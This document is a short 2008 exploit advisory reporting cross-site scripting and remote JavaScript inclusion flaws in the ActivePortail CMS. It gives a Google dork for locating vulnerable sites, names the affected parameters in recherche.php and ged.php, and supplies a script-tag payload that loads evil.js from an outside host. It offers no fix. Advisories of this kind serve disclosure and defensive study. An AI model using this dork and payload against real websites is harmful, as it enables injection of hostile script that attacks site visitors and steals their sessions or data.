+================================================================================================+
+          ActivePortail  - Copyright AGIIR Network 2007/2008  &  XSS - Remote Java Inclusion    +
+================================================================================================+


Author(s): Ivan Sanchez 

Product: ActivePortail® CMS  - Copyright AGIIR Network 2007/2008 

Web:http:http://www.activeportail.fr/

Versions: All Version

Date: 14/10/2008

"
ActivePortail® CMS est un outil de gestion de contenu web dynamique,
il permet de créer et exploiter les pages de votre portail internet..."




GOOGLE DORKS:
------------

intext:" Copyright AGIIR Network "



Parameters Affected:
-------------------


1-recherche.php? (from Post)

mot_rech =insert-evil-remote-java.js


2-ged.php?  (from querystring)

pkcateg=insert-evil-remote-java.js       




(and other parameters are affected.)


Example insert remote file:  "><script src=http://site/scripts/evil.js></script> 





            NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+================================================================================================+
+          ActivePortail  - Copyright AGIIR Network 2007/2008  &  XSS - Remote Java Inclusion    +
+================================================================================================+